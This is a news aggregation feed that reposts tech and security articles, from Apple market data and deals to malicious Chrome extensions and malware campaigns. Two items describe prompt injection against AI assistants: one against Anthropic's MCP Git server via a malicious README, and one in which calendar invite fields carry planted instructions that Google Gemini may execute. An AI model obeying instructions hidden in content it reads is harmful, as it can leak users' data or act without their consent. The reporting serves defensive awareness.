Apple reclaimed the leading position in China's smartphone market in the fourth quarter of 2025 as strong demand for the iPhone 17 lineup offset a contracting market and growing supply-chain pressure from memory chip shortages.


New data from Counterpoint Research shows that smartphone shipments in China declined 1.6% year over year in the fourth quarter of 2025 and fell 0.6% for the full year, reflecting weaker consumer demand driven primarily by rising prices linked to escalating memory costs. Within that environment, Apple's performance diverged sharply from the market as a whole. Counterpoint said Apple's shipments in China rose 28% year over year during the holiday quarter, allowing the company to rank first in the market with a 22% share in the fourth quarter.

The improvement marks a notable reversal from earlier in 2025, when Apple trailed domestic competitors in China. According to Counterpoint, the change was driven by strong demand for the ‌iPhone 17‌ lineup, which accounted for roughly 20% of Apple's shipments in China during the quarter. The firm noted demand was particularly concentrated among the Pro models. Counterpoint added that Apple benefited from an accelerated supply ramp up late in the year, enabling it to meet holiday demand more effectively than some rivals that were constrained by component availability.

The notable exception within Apple's lineup was the iPhone Air. Counterpoint said the model captured only a low single-digit share of Apple's China shipments following its debut. This is attributed to a slower start due to the device's later launch compared with other regions and to perceived trade-offs between its ultra-thin design and overall feature set.

For the full year, Apple did not lead the Chinese market, but it narrowed the gap with domestic competitors. Counterpoint said Huawei ranked first in China for 2025 with a 16.4% market share, followed closely by Apple and vivo at around 16% each. Xiaomi and Oppo trailed slightly behind at roughly 15% each.

According to IDC's Worldwide Quarterly Mobile Phone Tracker, global smartphone shipments reached 1.26 billion units in 2025, up 1.9% year over year. Globally, Apple remained the largest smartphone vendor in 2025, shipping 247.8 million iPhones for a 19.7% market share. Apple's shipments grew 6.3% year over year. Samsung ranked second with 241.2 million units shipped and a 19.1% share, while Xiaomi placed third with 165.3 million units and a 13.1% share, despite a year-over-year decline.Tags: China, Counterpoint, IDC
This article, "Apple Regains Top Spot in China's Smartphone Market" first appeared on MacRumors.com

Discuss this article in our forums

View the full article

• 0 comments
• 32 views

reporter

January 20Jan 20

Woot's New Apple Sale Takes Up to $450 Off Studio Display and More

Woot's New Apple Sale Takes Up to $450 Off Studio Display and More

Woot this week kicked off a new Apple sale that includes some of the lowest prices we've tracked on the Studio Display in months. The items that we're focusing on in this sale are all in new condition and come with a one year Apple limited warranty, but there are other items that are refurbished.

Note: MacRumors is an affiliate partner with Woot. When you click a link and make a purchase, we may receive a small payment, which helps us keep the site running.

Prices on the 27-inch Studio Display start at $1,349.00 for the standard glass/VESA mount adapter, down from $1,599.00, and also includes all of the nano-texture glass options. We haven't tracked deals on the Studio Display in quite a while, so these are solid markdowns for anyone who's been waiting for a sale.

UP TO $450 OFFApple Studio Display at Woot

Another notable discount in this sale is Apple's 1m Thunderbolt 4 (USB-C) Pro Cable for $35.99, down from $69.00. This accessory is also in new condition and it comes in bulk packaging. You'll find a few similar charging accessories on sale during this event, including Apple first party USB-C and Lightning cables.

In addition to the base discounts, you can use the code APPLEFIVE at checkout to get an extra $5 off every item in this sale. If you're on the hunt for more discounts, be sure to visit our Apple Deals roundup where we recap the best Apple-related bargains of the past week.



Deals Newsletter

Interested in hearing more about the best deals you can find in 2026? Sign up for our Deals Newsletter and we'll keep you updated so you don't miss the biggest deals of the season!




Related Roundup: Apple Deals
This article, "Woot's New Apple Sale Takes Up to $450 Off Studio Display and More" first appeared on MacRumors.com

Discuss this article in our forums

View the full article

• 0 comments
• 35 views

reporter

January 20Jan 20

Fünf Chrome-Erweiterungen, die Unternehmenssitzungen kapern

Fünf Chrome-Erweiterungen, die Unternehmenssitzungen kapern

T. Schneider – shutterstock.com
Forscher des Security-Anbieters Socket haben eine koordinierte Kampagne entdeckt, die auf bösartigen Chrome-Add-ons basiert. Die Angreifer haben die Abwehrmechanismen des Chrome Web Stores umgangen und Erweiterungen als Produktivitätswerkzeuge beworben.
„Die Erweiterungen arbeiten zusammen, um Authentifizierungs-Token zu stehlen, Incident-Response-Funktionen zu blockieren und durch Session-Hijacking die vollständige Übernahme von Konten zu ermöglichen“, erklären die Sicherheitsspezialisten in einem Blogbeitrag.
Die Hintermänner der Kampagne veröffentlichten fünf Chrome-Erweiterungen, die trotz professionellem Branding und scheinbar legitimen Anwendungsfällen tief im Inneren der Unternehmens-Workflows bösartige Aktionen ausführen.
Die Installationszahlen deuten darauf hin, dass über 2.300 Nutzer dazu verleitet wurden, diese Tools zu installieren. Die Erweiterungen zielen auf Systeme wie Workday, NetSuite und SuccessFactors ab, wo eine einzige gekaperte Sitzung Mitarbeiterdaten, Finanzdaten und interne Arbeitsabläufe offenlegen kann.
Getarnte Produktivitäts-Tools mit bösartigen Codes
Die Erweiterungen gaben sich als Produktivitäts-Booster oder Sicherheitshelfer für Enterprise-Anwender aus. In den Einträgen zeigten die Angreifer professionell gestaltete Dashboards und versprachen einen vereinfachten Zugriff auf HR- oder ERP-Tools. Die angeforderten Berechtigungen waren dabei „Standard“ und umfassten scheinbar harmlose Funktionen wie Cookie-Zugriff oder die Modifikation von Websites.
Nach der Installation exfiltrierten jedoch drei der Erweiterungen, darunter DataByCloud Access, Data By Cloud 1 und eine Variante namens Software Access, Session Cookies mit Authentifizierungs-Token an eine vom Angreifer kontrollierte Infrastruktur. Diese Token reichen in vielen Unternehmenssystemen aus, um einen Benutzer ohne Passwort zu authentifizieren. In einigen Fällen wurden diese Cookies alle 60 Sekunden extrahiert, um aktuelle Anmeldedaten zu gewährleisten.
Kompromittierte Sitzungen können wie gestohlene Passwörter fungieren, da sie bereits die Anmeldeseiten und Multi-Faktor-Prüfungen durchlaufen haben und somit einen direkten Zugriff auf ein Konto ermöglichen, ohne die üblichen Sicherheitswarnungen auszulösen.
„Alle fünf Erweiterungen werden zum Zeitpunkt der Erstellung dieses Artikels noch untersucht“, so die Forscher. „Wir haben bei Googles Sicherheitsteam für den Chrome Web Store Anträge auf Entfernung gestellt.“
Blockierte Sicherheitsmaßnahmen und Hijacking von Sitzungen
Die Kampagne ging aber über den Diebstahl von Anmeldedaten hinaus. Zwei der Erweiterungen, Tool Access 11 und Data By Cloud 2, enthielten DOM-Manipulationsroutinen, die den Zugriff auf Sicherheits- und Verwaltungsseiten innerhalb der Zielplattformen aktiv blockierten. Dadurch Enterprise-Admins selbst dann keine Passwörter ändern, die Anmeldungshistorie einsehen oder kompromittierte Konten deaktivieren, wenn sie verdächtiges Verhalten feststellten.
Die technisch fortschrittlichste der fünf Erweiterungen, Software Access, bot zusätzlich zum Cookie-Diebstahl eine bidirektionale Cookie-Injektion, bei der gestohlene Session-Tokens wieder in einen vom Angreifer kontrollierten Browser eingebracht wurden. Mithilfe von APIs wie „chrome.cookies.set()“ implantiert diese Funktion gültige Authentifizierungs-Cookies direkt und gewährt den Angreifern eine authentifizierte Sitzung, ohne dass ahnungslose Benutzer weitere Maßnahmen ergreifen müssen.
„Während vier Erweiterungen unter databycloud1104 und die fünfte unter einem anderen Markennamen veröffentlicht werden, weisen alle fünf identische Infrastrukturmuster auf, was auf eine einzige koordinierte Operation hindeutet“, fügen die Forscher hinzu.
Tipps zum Schutz
Socket rät Unternehmen, Browser-Erweiterungen streng zu prüfen und zu beschränken, Berechtigungsanfragen genau zu prüfen und Add-ons zu entfernen, die unnötigerweise auf Cookies oder Enterprise-Websites zugreifen. Zudem empfiehlt der Blog, ungewöhnliche Session-Aktivitäten zu überwachen und Tools zu verwenden, die bösartiges Verhalten von Erweiterungen erkennen können, bevor es die Benutzer erreicht. (jm)

 
View the full article

• 0 comments
• 248 views

CSOonline

January 20Jan 20

Fünf Chrome-Erweiterungen, die Unternehmenssitzungen kapern

Fünf Chrome-Erweiterungen, die Unternehmenssitzungen kapern

T. Schneider – shutterstock.com
Forscher des Security-Anbieters Socket haben eine koordinierte Kampagne entdeckt, die auf bösartigen Chrome-Add-ons basiert. Die Angreifer haben die Abwehrmechanismen des Chrome Web Stores umgangen und Erweiterungen als Produktivitätswerkzeuge beworben.
„Die Erweiterungen arbeiten zusammen, um Authentifizierungs-Token zu stehlen, Incident-Response-Funktionen zu blockieren und durch Session-Hijacking die vollständige Übernahme von Konten zu ermöglichen“, erklären die Sicherheitsspezialisten in einem Blogbeitrag.
Die Hintermänner der Kampagne veröffentlichten fünf Chrome-Erweiterungen, die trotz professionellem Branding und scheinbar legitimen Anwendungsfällen tief im Inneren der Unternehmens-Workflows bösartige Aktionen ausführen.
Die Installationszahlen deuten darauf hin, dass über 2.300 Nutzer dazu verleitet wurden, diese Tools zu installieren. Die Erweiterungen zielen auf Systeme wie Workday, NetSuite und SuccessFactors ab, wo eine einzige gekaperte Sitzung Mitarbeiterdaten, Finanzdaten und interne Arbeitsabläufe offenlegen kann.
Getarnte Produktivitäts-Tools mit bösartigen Codes
Die Erweiterungen gaben sich als Produktivitäts-Booster oder Sicherheitshelfer für Enterprise-Anwender aus. In den Einträgen zeigten die Angreifer professionell gestaltete Dashboards und versprachen einen vereinfachten Zugriff auf HR- oder ERP-Tools. Die angeforderten Berechtigungen waren dabei „Standard“ und umfassten scheinbar harmlose Funktionen wie Cookie-Zugriff oder die Modifikation von Websites.
Nach der Installation exfiltrierten jedoch drei der Erweiterungen, darunter DataByCloud Access, Data By Cloud 1 und eine Variante namens Software Access, Session Cookies mit Authentifizierungs-Token an eine vom Angreifer kontrollierte Infrastruktur. Diese Token reichen in vielen Unternehmenssystemen aus, um einen Benutzer ohne Passwort zu authentifizieren. In einigen Fällen wurden diese Cookies alle 60 Sekunden extrahiert, um aktuelle Anmeldedaten zu gewährleisten.
Kompromittierte Sitzungen können wie gestohlene Passwörter fungieren, da sie bereits die Anmeldeseiten und Multi-Faktor-Prüfungen durchlaufen haben und somit einen direkten Zugriff auf ein Konto ermöglichen, ohne die üblichen Sicherheitswarnungen auszulösen.
„Alle fünf Erweiterungen werden zum Zeitpunkt der Erstellung dieses Artikels noch untersucht“, so die Forscher. „Wir haben bei Googles Sicherheitsteam für den Chrome Web Store Anträge auf Entfernung gestellt.“
Blockierte Sicherheitsmaßnahmen und Hijacking von Sitzungen
Die Kampagne ging aber über den Diebstahl von Anmeldedaten hinaus. Zwei der Erweiterungen, Tool Access 11 und Data By Cloud 2, enthielten DOM-Manipulationsroutinen, die den Zugriff auf Sicherheits- und Verwaltungsseiten innerhalb der Zielplattformen aktiv blockierten. Dadurch Enterprise-Admins selbst dann keine Passwörter ändern, die Anmeldungshistorie einsehen oder kompromittierte Konten deaktivieren, wenn sie verdächtiges Verhalten feststellten.
Die technisch fortschrittlichste der fünf Erweiterungen, Software Access, bot zusätzlich zum Cookie-Diebstahl eine bidirektionale Cookie-Injektion, bei der gestohlene Session-Tokens wieder in einen vom Angreifer kontrollierten Browser eingebracht wurden. Mithilfe von APIs wie „chrome.cookies.set()“ implantiert diese Funktion gültige Authentifizierungs-Cookies direkt und gewährt den Angreifern eine authentifizierte Sitzung, ohne dass ahnungslose Benutzer weitere Maßnahmen ergreifen müssen.
„Während vier Erweiterungen unter databycloud1104 und die fünfte unter einem anderen Markennamen veröffentlicht werden, weisen alle fünf identische Infrastrukturmuster auf, was auf eine einzige koordinierte Operation hindeutet“, fügen die Forscher hinzu.
Tipps zum Schutz
Socket rät Unternehmen, Browser-Erweiterungen streng zu prüfen und zu beschränken, Berechtigungsanfragen genau zu prüfen und Add-ons zu entfernen, die unnötigerweise auf Cookies oder Enterprise-Websites zugreifen. Zudem empfiehlt der Blog, ungewöhnliche Session-Aktivitäten zu überwachen und Tools zu verwenden, die bösartiges Verhalten von Erweiterungen erkennen können, bevor es die Benutzer erreicht. (jm)

 
View the full article

• 0 comments
• 252 views

CSOonline

January 20Jan 20

Three Flaws in Anthropic MCP Git Server Enable File Access and Code Execution

Three Flaws in Anthropic MCP Git Server Enable File Access and Code Execution

A set of three security vulnerabilities has been disclosed in mcp-server-git, the official Git Model Context Protocol (MCP) server maintained by Anthropic, that could be exploited to read or delete arbitrary files and execute code under certain conditions. "These flaws can be exploited through prompt injection, meaning an attacker who can influence what an AI assistant reads (a malicious README,View the full article

• 0 comments
• 50 views

Hacker News

January 20Jan 20

Hackers Use LinkedIn Messages to Spread RAT Malware Through DLL Sideloading

Hackers Use LinkedIn Messages to Spread RAT Malware Through DLL Sideloading

Cybersecurity researchers have uncovered a new phishing campaign that exploits social media private messages to propagate malicious payloads, likely with the intent to deploy a remote access trojan (RAT). The activity delivers "weaponized files via Dynamic Link Library (DLL) sideloading, combined with a legitimate, open-source Python pen-testing script," ReliaQuest said in a report shared withView the full article

• 0 comments
• 43 views

Hacker News

January 20Jan 20

iPhone Air to Get Minor Refresh This Year, Claims Leaker

iPhone Air to Get Minor Refresh This Year, Claims Leaker

Apple will launch a second-generation iPhone Air this year, despite reports that it has been delayed until 2027, according to the Weibo leaker known as Fixed Focus Digital.


Doubling down on a similar claim they made late last year, the leaker says feedback coming from the production line still suggests that the iPhone Air 2 will launch in the fall – presumably alongside the iPhone 18 Pro models and a rumored foldable iPhone.

The second-generation device will have "very minor changes," making it "basically a routine upgrade," the leaker said in comments machine-translated from Chinese.

The rumor comes in contrast to a November report from The Information that said Apple had decided to delay the launch of the next-generation ‌iPhone Air‌ until 2027 as a result of poor sales. A second report from the same outlet claimed Apple will use the delay to work on a redesign of the device that could include a second rear camera, as well as a lighter weight, vapor chamber cooling, and a larger battery capacity.

Notably, Bloomberg's Mark Gurman responded to these reports shortly after they were published, claiming his sources indicated that the iPhone Air 2 was not in fact delayed, because it had never been earmarked for 2026 in the first place. "The fact that Apple named the device the iPhone Air (rather than the iPhone 17 Air) signaled that it didn’t want to tie the product to an annual release schedule," said Gurman at the time.

Gurman believes a refreshed Air could potentially roll out in spring 2027 alongside the standard iPhone 18 and the iPhone 18e, as part of Apple's new split-launch strategy. In addition, Gurman's sources said the main focus of the second Air will be a move to a 2-nanometer chip that will improve the device's battery life, rather than introducing major structural changes.

It is still possible that a new ‌iPhone Air‌ could launch this coming fall, but the previous reports cast doubt on the Chinese leaker's claim. Fixed Focus Digital previously broke the news ahead of launch about the iPhone 16e name. Related Roundup: iPhone AirTag: Fixed Focus DigitalBuyer's Guide: iPhone Air (Buy Now)
This article, "iPhone Air to Get Minor Refresh This Year, Claims Leaker" first appeared on MacRumors.com

Discuss this article in our forums

View the full article

• 0 comments
• 33 views

reporter

January 20Jan 20

Content update 01-20-2026

Content update 01-20-2026

The following is the list of changes as part of the F5 Distributed Cloud Services documentation update:
Data Residency and Processing
Updated the Data Residency and Processing Reference document to add Google Cloud for NGINXaaS and remove Zapier, Inc. from sub-processors for F5 Distributed Cloud (DDoS Protection, CDN, WAAP, AI Assistant).
View the full article

• 0 comments
• 44 views

F5news

January 20Jan 20

The Hidden Risk of Orphan Accounts

The Hidden Risk of Orphan Accounts

The Problem: The Identities Left Behind As organizations grow and evolve, employees, contractors, services, and systems come and go - but their accounts often remain. These abandoned or “orphan” accounts sit dormant across applications, platforms, assets, and cloud consoles. The reason they persist isn’t negligence - it’s fragmentation.  Traditional IAM and IGA systems are designedView the full article

• 0 comments
• 46 views

Hacker News

January 20Jan 20

Evelyn Stealer Malware Abuses VS Code Extensions to Steal Developer Credentials and Crypto

Evelyn Stealer Malware Abuses VS Code Extensions to Steal Developer Credentials and Crypto

Cybersecurity researchers have disclosed details of a malware campaign that's targeting software developers with a new information stealer called Evelyn Stealer by weaponizing the Microsoft Visual Studio Code (VS Code) extension ecosystem. "The malware is designed to exfiltrate sensitive information, including developer credentials and cryptocurrency-related data. Compromised developerView the full article

• 0 comments
• 40 views

Hacker News

January 20Jan 20

CrashFix attack hijacks browser failures to deliver ModelRAT malware via fake Chrome extension

CrashFix attack hijacks browser failures to deliver ModelRAT malware via fake Chrome extension

Security researchers have uncovered a malicious browser extension campaign, dubbed CrashFix, that deliberately crashes victims’ browsers and then uses the resulting confusion to trick users into running attacker-supplied commands.

The activity, attributed to a threat cluster Huntress calls KongTuke, involves a fake Chrome extension posing as an ad-blocking tool but ultimately delivering a novel malware payload.
The extension, which Huntress identified as NexShield-Advanced Web Protection, was distributed through look-alike branding and deceptive metadata designed to resemble a legitimate browser security tool, uBlock Origin Lite ad blocker. After installation, it remains inactive for a period of time, likely to evade immediate suspicion, before intentionally destabilizing the browser by exhausting system resources and triggering repeated crashes.
Once the browser becomes unusable, victims are presented with a fake “repair” prompt instructing them to paste and execute a command to resolve the issue.
From fake protection to forced failure
According to Huntress’ analysis, the malicious extension does not immediately perform malicious actions. Instead, it waits approximately an hour after installation before initiating the crash routine. The extension repeatedly opens connections and consumes memory until the browser becomes unresponsive, forcing users to restart or troubleshoot what appears to be a legitimate failure.
“The extension sets up to two timers: the first triggers once after a 60-minute delay, and the second fires every 10 minutes after the initial trigger,” Huntress researchers said in a blog post. “This timing strategy is in place so that when a user installs the extension, nothing malicious happens immediately. Sixty minutes later, the malicious payload activates, and every 10 minutes thereafter, the payload continues to execute.”
On relaunch, the victim receives an alert claiming the browser encountered a critical error and requires manual remediation. Victims are instructed to open the Windows Run dialog and paste a command already copied to the clipboard. This command launches the next stage of the attack.
Huntress emphasized that this technique mirrors a growing trend in “ClickFix”-style attacks, where users are socially engineered into executing malicious code themselves under the guise of system recovery or security remediation. ClickFix techniques have been observed across multiple DPRK-linked campaigns, including variants associated with the long-running Contagious Interview operation.
Payload delivery
When the user executes the supplied commands, a multistage infection process begins that ultimately deploys a previously undocumented Python-based remote access trojan, which the researchers dubbed ModelRAT. The malware establishes persistence and enables remote control of the infected system.
Huntress’ telemetry suggested differing behavior based on the environment. Systems joined to a domain were more likely to receive the full payload chain, while non-domain systems sometimes received lighter or incomplete stages.
The researchers also drew parallels between the CrashFix execution flow and SocGholish (FakeUpdates) campaigns, noting the shared reliance on user-driven execution rather than technical exploitation. As with SocGholish activity, the attacker’s success depends on convincing the victim to manually run a command under the guise of remediation or system recovery.
Recommendations included removing untrusted or look-alike browser extensions and reinforcing guidance against manually executing “fix” commands prompted by browser errors. The researchers also shared indicators of compromise (IOCs) tied to the malicious extension, command execution, and follow-on activity to aid detection and response.
View the full article

• 0 comments
• 40 views

CSOonline

January 20Jan 20

Cloudflare Fixes ACME Validation Bug Allowing WAF Bypass to Origin Servers

Cloudflare Fixes ACME Validation Bug Allowing WAF Bypass to Origin Servers

Cloudflare has addressed a security vulnerability impacting its Automatic Certificate Management Environment (ACME) validation logic that made it possible to bypass security controls and access origin servers.  "The vulnerability was rooted in how our edge network processed requests destined for the ACME HTTP-01 challenge path (/.well-known/acme-challenge/*)," the web infrastructureView the full article

• 0 comments
• 45 views

Hacker News

January 20Jan 20

Why Secrets in JavaScript Bundles are Still Being Missed

Why Secrets in JavaScript Bundles are Still Being Missed

Leaked API keys are no longer unusual, nor are the breaches that follow. So why are sensitive tokens still being so easily exposed? To find out, Intruder’s research team looked at what traditional vulnerability scanners actually cover and built a new secrets detection method to address gaps in existing approaches.  Applying this at scale by scanning 5 million applications revealed overView the full article

• 0 comments
• 41 views

Hacker News

January 20Jan 20

Google Gemini flaw exposes new AI prompt injection risks for enterprises

Google Gemini flaw exposes new AI prompt injection risks for enterprises

A newly disclosed weakness in Google’s Gemini shows how attackers could exploit routine calendar invitations to influence the model’s behavior, underscoring emerging security risks as enterprises embed generative AI into everyday productivity and decision-making workflows.
The vulnerability was identified by application security firm Miggo. In its report, Miggo’s head of research, Liad Eliyahu, said Gemini parses the full context of a user’s calendar events, including titles, times, attendees, and descriptions, allowing it to answer questions such as what a user’s schedule looks like for the day.
“The mechanism for this attack exploits that integration,” Eliyahu said. “Because Gemini automatically ingests and interprets event data to be helpful, an attacker who can influence event fields can plant natural language instructions that the model may later execute.” 
Miggo’s researchers said the finding highlights a broader security challenge facing LLM-based systems, where attacks focus on manipulating meaning and context rather than exploiting clearly identifiable malicious code.
“This Gemini vulnerability isn’t just an isolated edge case,” Eliyahu said. “Rather, it is a case study in how detection is struggling to keep up with AI-native threats. Traditional AppSec assumptions (including recognizable patterns and deterministic logic) do not map clearly to systems that reason in language and intent.”
Severity vs traditional attacks
The issue is significant not because it mirrors a conventional software flaw, but because it demonstrates how AI systems can be manipulated in ways similar to social engineering attacks.
“Traditionally, a calendar invite, email, or document is treated as data only,” said Sunil Varkey, a cybersecurity analyst. “The attacker must break code logic or memory safety to make the system ‘do something’, rather than rely on data alone.”
But in this case, the ‘bug’ is less about flawed code and more about how an LLM interprets language in context, combined with the permissions it has across connected applications, said Sakshi Grover, senior research manager for IDC Asia Pacific Cybersecurity Services.
“That combination turns a normal business object, a calendar invite, into an attack payload,” Grover said. “It reveals that LLM security at major vendors is still catching up to real-world enterprise threat models, especially around indirect prompt injection, tool use, and cross-app data handling.”
Keith Prabhu, founder and CEO of Confidis, said that while the execution of this attack occurs through Google Gemini, it more closely resembles a phishing-style technique.
“Once the malicious invite is accepted by the user, Gemini considers the accepted invite as trusted and executes the prompt,” Prabhu said. “While the rest of the computing world is moving towards Zero Trust, AI tools still trust desktop components implicitly. This can be a serious flaw since AI tools can be misused to act as a ‘concierge’ to do tasks that malware cannot directly do.”
Real enterprise exposure
Analysts point out that the risk is significant in enterprise environments as organizations rapidly deploy AI copilots connected to sensitive systems.
“As internal copilots ingest data from emails, calendars, documents, and collaboration tools, a single compromised account or phishing email can quietly embed malicious instructions,” said Chandrasekhar Bilugu, CTO of SureShield. “When employees run routine queries, the model may process this manipulated context and unintentionally disclose sensitive information.”
Grover said that threats of prompt injection have moved from theoretical to operational. “In IDC’s Asia/Pacific Study conducted in August 2025, enterprises in India cited ‘LLM prompt injection, model manipulation, or jailbreaking AI assistants’ as the second most concerning AI-driven threat, right after ‘model poisoning or adversarial inputs during AI training’,” she added.
Measures to prioritize
Prabhu said that security leaders need to include AI security awareness as a part of their annual information security training for all staff. The endpoints would also need to be hardened, keeping in mind threats due to this new attack vector.
Grover said organizations should assume prompt injection attacks will occur and focus on limiting the potential blast radius rather than trying to eliminate the risk altogether. She said this requires enforcing least privilege for AI systems, tightly scoping tool permissions, restricting default data access, and validating every AI-initiated action against business rules and sensitivity policies.
“The goal is not to make the model immune to language, because no model is, but to ensure that even if it is manipulated, it cannot quietly access more data than it should or exfiltrate information through secondary channels,” Grover added.
Varkey said security leaders should also rethink how they position AI copilots within their environments, warning against treating them like simple search tools. “Apply Zero Trust principles with strong guardrails: limit data access to least privilege, ensure untrusted content can’t become trusted instruction, and require approvals for high-risk actions such as sharing, sending, or writing back into business systems,” he added.
View the full article

• 0 comments
• 36 views

CSOonline

January 20Jan 20

iPhone 18 Pro Leak: Smaller Dynamic Island, No Top-Left Camera Cutout

iPhone 18 Pro Leak: Smaller Dynamic Island, No Top-Left Camera Cutout

Over the last few months, rumors around the iPhone 18 Pro's front-panel design have been conflicted, with some supply-chain leaks pointing to under-display Face ID, reports suggesting a top-left hole-punch camera, and debate over whether the familiar Dynamic Island will shrink, shift, or disappear entirely.

Today, Weibo-based leaker Instant Digital shared new details and imagery that appear to clarify the situation.


The image shows what looks to be a leaked Face ID sensor assembly made up of three distinct modules mounted on a single flex cable: an infrared flood illuminator on the left, and a centered dot projector with an infrared camera to its right.

Crucially, this layout suggests that the flood illuminator – being relatively small and optically simple – is the only Face ID component likely to be placed under the display, in the top-left area of the screen. The dot projector and infrared camera, by contrast, would remain centered and housed within a reduced, pill-shaped Dynamic Island.

Last month, The Information reported that the front camera would be moved to the top-left corner of the display on iPhone 18 Pro models, explicitly claiming this change would eliminate the pill-shaped cutout. Instant Digital now appears to be pushing back on that interpretation.

According to the leaker, early reports from Chinese and Korean sources about the possible relocation of an infrared component were later mistranslated in some English-language coverage as a visible left-side hole-punch front camera. That leap conflated different Face ID elements and overlooked how Apple typically evolves its front sensor layout, allowing a minor internal change to be misread as a major external redesign.

In short, reports of a top-left hole-punch camera on the iPhone 18 Pro and iPhone 18 Pro Max now appear to be incorrect. The only visible change suggested by the leak is a smaller, centered Dynamic Island – as per some reports – enabled by relocating the IR flood illuminator outside of it and under the display.

Apple is likely to unveil the iPhone 18 Pro models in September. Barring any more conflicting rumors, we now have a clearer picture of what to expect the front display to look like. Related Roundup: iPhone 18Tag: Instant DigitalRelated Forum: iPhone
This article, "iPhone 18 Pro Leak: Smaller Dynamic Island, No Top-Left Camera Cutout" first appeared on MacRumors.com

Discuss this article in our forums

View the full article

• 0 comments
• 38 views

reporter

January 20Jan 20

Why the future of security starts with who, not where

Why the future of security starts with who, not where

For a long time, cybersecurity was pretty straightforward: Guard the edges, and everything inside should be fine. Firewalls, DMZs, VPNs — these were the go-to tools. Back then, it worked. Apps lived in data centers, and everyone showed up at the office. But that world disappeared before most companies even noticed.
Remote work, cloud adoption and distributed applications slowly dissolved the network edge. And attackers took advantage of that gap long before defenders adapted. Verizon’s annual Data Breach Investigations Report repeatedly shows that a large portion — often over 80% — of modern breaches involve compromised credentials, not network flaws.
That number says a lot. It tells us the perimeter didn’t just shift — it collapsed around identity.
The old perimeter: Strong walls, weak assumptions
Traditional security assumed one thing: “If someone is inside the network, they can be trusted.”
That assumption worked when offices were closed environments and systems lived behind a single controlled gateway. But as Microsoft highlights in its Digital Defense Report, attackers have moved almost entirely toward identity-based attacks because stealing credentials offers far more access than exploiting firewalls.
In other words, attackers stopped trying to break in. They simply started logging in.
Cloud + remote work = No perimeter
Now, with remote work and the cloud, there’s no real perimeter left. People connect from home Wi-Fi, personal laptops, airports, coffee shops — you name it. At the same time, company data and workloads are scattered across AWS, Azure, Google Cloud and various SaaS platforms. The old rules just don’t fit anymore.
There is no single “inside” anymore. There is only identity — the user behind the request.
This is why modern security frameworks, including NIST’s Zero Trust Architecture guidelines (SP 800-207), emphasise identity as the primary control point rather than the network.
Identity is now the primary attack surface
Identity brings convenience, but it also brings complexity — and complexity attracts attackers.
People reuse passwords. MFA fatigue attacks work far too often. Privileged accounts get over-granted. Contractors keep access long after their projects end. Service accounts multiply with no owner. Okta’s recent State of Identity Security report points out that identity misuse has become one of the fastest-growing attack vectors in enterprises.
Identity is no longer just a log-in step. It’s now the attacker’s first target.
Zero trust made identity the first door to lock
Zero trust isn’t about paranoia. It’s about verification. Never trust, always verify only works if identity sits at the center of every access decision.
That’s why CISA’s zero trust maturity model outlines identity as the foundation on which all other zero trust pillars rest — including network segmentation, data security, device posture and automation.
A strong identity-based perimeter includes:
MFA everywhere SSO to reduce password fatigue Role-based access controls Privileged Access Management Device trust tied to user identity Continuous monitoring of user behaviour Adaptive, risk-based access policies This isn’t the future — this is what’s expected today.
Identity done right requires real discipline
When identity becomes the perimeter, it can’t be an afterthought. It needs to be treated like core infrastructure. That means:
Identity has to be engineered, not patched together. Lifecycle processes must be streamlined — joiners, movers and leavers must be tightly controlled. Privilege needs to be what people earn, not what they start with. Excess-access is still one of the top contributors to breaches. Authentication methods need to evolve yearly. Static MFA policies won’t survive dynamic threats. Monitoring must follow behavior, not networks. Suspicious activity often hides in user patterns, not traffic flows. Identity ownership must be shared across security, IT and the business. Identity doesn’t succeed unless everyone is accountable. Gartner has been emphasising this shift for years, calling identity “the new security perimeter” in multiple research publications aimed at CISOs and enterprise architects
Where we’re heading next
Identity is already at the centre of modern cybersecurity, but its role is only going to grow stronger. Over the next few years:
Passwords will fade out in favour of passkeys and biometrics. Machine identities will become as critical as human identities. Access decisions will adapt in real time based on behaviour. Identity platforms will become the central nervous system of enterprise security. Zero Trust will mature from architecture diagrams into everyday practice. Organizations that invest in strong identity foundations won’t just improve security — they’ll improve operations, compliance, resilience and trust. Because when identity is solid, everything else becomes clearer: who can access what, who is responsible for what and where risk actually lives.
The companies that struggle will be the ones trying to secure a world that no longer exists — a perimeter that disappeared years ago.
Identity isn’t just the new perimeter.
It’s the new beginning.
Everything starts here now.
This article is published as part of the Foundry Expert Contributor Network.
Want to join?
View the full article

• 0 comments
• 48 views

CSOonline

January 20Jan 20

Fake-Video mit Reinhold Würth wirbt für dubiose Geldanlagen

Fake-Video mit Reinhold Würth wirbt für dubiose Geldanlagen

MirasWonderland – shutterstock.com
Mit einem gefälschten Video des bekannten Unternehmers Reinhold Würth versuchen Betrüger derzeit, Nutzer im Internet zu dubiosen Geldanlagen zu verleiten. In dem täuschend echt wirkenden Clip lädt eine mutmaßlich mit Hilfe von Künstlicher Intelligen (KI) generierte Version des Milliardärs zu einem vermeintlich exklusiven Investment ein. Im Hintergrund sieht man ein Regal mit Produkten des Handelskonzerns. Das Versprechen: Schnelle Gewinne schon bei geringen Einsätzen. Die Gruppe bestätigte, dass es sich um eine Fälschung handelt. Zuvor hatten mehrere Medien berichtet. 
Reinhold Würth stehe in keinerlei Verbindung zu derartigen Angeboten, teilte eine Pressesprecherin auf Anfrage mit. “Solche Deep‑Fake‑Manipulationen stellen einen schweren Identitätsmissbrauch dar und dienen ausschließlich betrügerischen Zwecken.” Man verurteile das Vorgehen aufs Schärfste und distanziere sich klar von den verbreiteten Inhalten.
Die Würth-Gruppe geht demnach bereits konsequent gegen die Verbreitung des Materials vor und steht im Austausch mit den Strafverfolgungsbehörden. Über offizielle Social-Media-Kanäle sei die Öffentlichkeit vor dem Fake-Video gewarnt worden. Betroffenen rät das Unternehmen, keine Interaktionen mit den angeblichen Finanzangeboten einzugehen. Wer bereits Geld investiert habe, solle umgehend seine Bank informieren und Anzeige bei der Polizei erstatten.
Würth mit Sitz in Künzelsau (Baden-Württemberg) gilt als Weltmarktführer im Bereich der Befestigungs- und Montagetechnik. Das Sortiment umfasst mehr als eine Million Produkte – unter anderem Schrauben und Dübel. Firmenpatriarch Reinhold Würth zählt zu den reichsten Deutschen. Vor gut einem Jahr hatte sich der 90-Jährige weitgehend von seinem Lebenswerk zurückgezogen. 
Angebote sind oft schwer als Betrug zu erkennen
